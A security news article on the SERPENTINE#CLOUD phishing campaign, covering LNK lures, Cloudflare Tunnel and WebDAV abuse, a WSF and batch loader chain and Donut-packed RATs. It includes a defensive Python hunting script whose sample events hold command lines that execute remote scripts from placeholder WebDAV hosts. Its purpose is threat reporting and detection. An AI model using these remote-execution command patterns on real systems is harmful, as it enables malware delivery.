New Malware Campaign Delivers RATs Through Phishing via Cloudflare Tunnels


Cybersecurity Threat: The SERPENTINE#CLOUD Campaign

Overview of the Attack

A recent cybersecurity investigation has revealed an insidious campaign dubbed SERPENTINE#CLOUD. This operation exploits Cloudflare Tunnel subdomains to deliver malicious payloads, primarily through phishing emails. Security researchers at Securonix noted that the campaign employs Python-based loaders and cleverly crafted shortcut files to execute its attacks.

Phishing Methodology

The attack initiates with the distribution of phishing emails that typically wield themes around invoices or payments. These emails contain links to zipped documents, which house Windows shortcut (LNK) files disguised as legitimate documents. When victims open these malicious shortcuts, they inadvertently initiate the infection process.

Multi-Step Infection

This infection chain is notably intricate, culminating in the activation of a Python-based shellcode loader. It executes payloads using the Donut loader, which operates entirely in memory to avoid detection. According to Tim Peck, a security researcher, this technique makes it increasingly difficult for security defenses to trace and neutralize the threat.

Targeted Regions

Securonix has reported that the campaign primarily targets regions including the United States, United Kingdom, Germany, and various areas across Europe and Asia. Although the identity of the cybercriminals remains unclear, their fluency in English hints at a sophisticated level of operational planning.

Evolution of Tactics

What stands out in this case is the campaign’s adaptability. Initially using internet shortcuts, the attackers have shifted to LNK files masquerading as PDF documents. The payloads retrieved through this method are accessed over WebDAV via the compromised Cloudflare subdomains, illustrating a clear evolution in their tactics.

Previous Incidents

It’s important to note that a variation of this attack had been previously documented by companies like eSentire and Proofpoint. Earlier campaigns set the stage for the distribution of various remote access trojans (RATs) such as AsyncRAT, GuLoader, and Venom RAT.

Utilizing Cloudflare Infrastructure

One of the key advantages attackers gain from abusing Cloudflare Tunnel infrastructure is evasion of detection. By hosting payloads behind a legitimate cloud service's domains, they blend in with ordinary traffic, making it hard for defenders to separate genuine from malicious connections and complicating conventional domain- and reputation-based blocking.

Infection Process

The infection sequence begins when a victim opens the LNK file, which downloads a next-stage payload, a Windows Script File (WSF). The WSF is executed silently via cscript.exe, so nothing visible prompts the user and the execution passes unnoticed.

The Role of the WSF File

The WSF file serves as a lightweight loader crafted in VBScript. Its primary function is to launch an external batch file from a secondary Cloudflare domain. Peck elaborates that this batch file, named kiki.bat, is crucial for payload delivery, serving as the next stage in the infection timeline.

Stealthy Operations

The batch script is designed to execute in a stealthy manner, displaying a decoy PDF to distract users while checking for antivirus measures. Subsequently, it downloads and runs Python-based payloads, including those packed by Donut, which can deploy diverse RATs.
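As an added defender-side example (not code from the article or from Securonix), the following Python hunts process-creation events for the chain just described: cscript.exe running a .wsf, which spawns cmd.exe on a .bat, which spawns a Python interpreter, and flags whether either script was pulled over a WebDAV UNC path. The event fields, host names and paths are constructed assumptions.

```python
import re

# Constructed process-creation events modelled on the chain in the article
# (field names pid/ppid/image/cmdline are an assumption, not a real log schema).
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r'cscript.exe //nologo "\\tunnel-a.example@SSL\DavWWWRoot\invoice.wsf"'},
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "\\tunnel-b.example@SSL\DavWWWRoot\kiki.bat"'},
    {"pid": 103, "ppid": 102, "image": r"C:\Users\u\AppData\Local\Temp\py\python.exe",
     "cmdline": "python.exe loader.py"},
    # Benign admin script: cscript.exe on a local .wsf with no child cmd/python.
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe C:\Scripts\backup.wsf"},
]

# Windows WebDAV mini-redirector UNC form: \\host@SSL\DavWWWRoot\...
WEBDAV_UNC = re.compile(r"\\\\[^\\\s]+@SSL\\", re.IGNORECASE)


def image_name(event):
    """Basename of the image path, lower-cased for comparison."""
    return event["image"].rsplit("\\", 1)[-1].lower()


def children(events, pid):
    return [e for e in events if e["ppid"] == pid]


def find_chains(events):
    """Return one finding per cscript.exe(.wsf) -> cmd.exe(.bat) -> python chain."""
    findings = []
    for wsf in events:
        if image_name(wsf) != "cscript.exe" or ".wsf" not in wsf["cmdline"].lower():
            continue
        for bat in children(events, wsf["pid"]):
            if image_name(bat) != "cmd.exe" or ".bat" not in bat["cmdline"].lower():
                continue
            for py in children(events, bat["pid"]):
                if not image_name(py).startswith("python"):
                    continue
                webdav = bool(WEBDAV_UNC.search(wsf["cmdline"])
                              or WEBDAV_UNC.search(bat["cmdline"]))
                findings.append({"chain": [wsf["pid"], bat["pid"], py["pid"]],
                                 "webdav_fetch": webdav})
    return findings


if __name__ == "__main__":
    for hit in find_chains(EVENTS):
        print(hit)
```

The WebDAV flag is the higher-confidence signal; a cscript.exe-to-cmd.exe-to-python chain on its own can occur in legitimate automation, so treat the two together.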

Code Characteristics

Interestingly, there’s a possibility that the batch script could have been coded with the assistance of a large language model, as suggested by the well-defined comments present in its source code. Securonix emphasizes that the complexities involved in the SERPENTINE#CLOUD attack chain indicate a blend of social engineering and advanced evasion techniques.

Related Threats: Shadow Vector and ClickFix

Shadow Vector in Colombia

In a related discovery, Acronis exposed another malware campaign dubbed Shadow Vector targeting Colombian users. This operation utilizes malicious SVG files embedded in phishing emails that impersonate court notifications. It highlights a broader trend of using digital vectors to deliver malware effectively.

ClickFix Technique Explains Drive-By Compromises

Evolving methods such as the ClickFix tactic have been increasingly prevalent. This approach exploits the natural actions of users to introduce malware under the guise of fixing minor issues or verifying actions like CAPTCHA inputs. Recent data reveals that drive-by compromises rose to represent 23% of phishing tactics, emphasizing the need to recognize and adapt against such methodologies.

Conclusion

As cyber threats continue to evolve, understanding the complex interactions and methods employed in campaigns like SERPENTINE#CLOUD is essential. The blend of social engineering, cloud infrastructure, and sophisticated infection processes not only complicates detection but also poses an ongoing challenge to digital security across various sectors.
